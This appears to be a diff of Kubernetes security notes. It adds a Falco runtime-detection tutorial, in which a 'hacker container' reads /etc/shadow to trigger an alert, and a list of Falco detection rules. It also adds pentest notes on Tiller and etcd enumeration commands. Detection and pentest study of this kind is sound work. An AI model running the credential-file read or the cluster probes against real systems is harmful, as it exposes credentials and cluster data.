* **Navigate to the Cilium Editor** [**https://editor.cilium.io/**](https://editor.cilium.io)
![Scenario 20 NSP Cilium](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-2.png)
### Miscellaneous
* [https://kubernetes.io/docs/concepts/services-networking/network-policies/](https://kubernetes.io/docs/concepts/services-networking/network-policies/)
* [https://github.com/ahmetb/kubernetes-network-policy-recipes](https://github.com/ahmetb/kubernetes-network-policy-recipes)
* [https://editor.cilium.io/](https://editor.cilium.io)

View file

@ -0,0 +1,71 @@
# Monitoring with Falco
This tutorial was taken from [https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-information](https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-information)
### Scenario Information
In this scenario you deploy runtime security monitoring & detection for containers and Kubernetes resources.
* To get started with this scenario you can deploy the below helm chart
> NOTE: Make sure you run the following deployment using Helm v3.
```bash
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco
```
![Scenario 18 helm falco setup](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-1.png)
### [Scenario Solution](https://madhuakula.com/kubernetes-goat/scenarios/scenario-18.html#scenario-solution)
> `Falco`, the cloud-native runtime security project, is the de facto Kubernetes threat detection engine. Falco was created by Sysdig in 2016 and is the first runtime security project to join CNCF as an incubation-level project. Falco detects unexpected application behavior and alerts on threats at runtime.
Falco uses system calls to secure and monitor a system, by:
* Parsing the Linux system calls from the kernel at runtime
* Asserting the stream against a powerful rules engine
* Alerting when a rule is violated
Falco ships with a default set of rules that check the kernel for unusual behavior such as:
* Privilege escalation using privileged containers
* Namespace changes using tools like `setns`
* Read/Writes to well-known directories such as /etc, /usr/bin, /usr/sbin, etc
* Creating symlinks
* Ownership and Mode changes
* Unexpected network connections or socket mutations
* Spawned processes using execve
* Executing shell binaries such as sh, bash, csh, zsh, etc
* Executing SSH binaries such as ssh, scp, sftp, etc
* Mutating Linux coreutils executables
* Mutating login binaries
* Mutating shadowutils or passwd executables such as shadowconfig, pwck, chpasswd, getpasswd, chage, useradd, etc.
* Get more details about the falco deployment
```bash
kubectl get pods --selector app=falco
```
![Scenario 18 falco get pods](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-2.png)
* Manually obtain the logs from the falco pods
```bash
kubectl logs -f -l app=falco
```
* Now, let's spin up a hacker container, read a sensitive file, and see whether Falco detects it
```bash
kubectl run --rm --restart=Never -it --image=madhuakula/hacker-container -- bash
```
* Read the sensitive file
```bash
cat /etc/shadow
```
![Scenario 18 falco detect /etc/shadow](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-18-3.png)

View file

@ -33,6 +33,7 @@ The following ports might be open in a Kubernetes cluster:
| 9099/TCP | calico-felix | Health check server for Calico |
| 6782-4/TCP | weave | Metrics and endpoints |
| 30000-32767/TCP | NodePort | Proxy to the services |
| 44134/TCP | Tiller | Helm service listening |
### Kube-apiserver
@ -81,6 +82,18 @@ curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
```
### Tiller
```
helm --host tiller-deploy.kube-system:44134 version
```
You could abuse this service to escalate privileges inside Kubernetes:
{% content-ref url="../44134-pentesting-tiller-helm.md" %}
[44134-pentesting-tiller-helm.md](../44134-pentesting-tiller-helm.md)
{% endcontent-ref %}
### cAdvisor
A service useful for gathering metrics.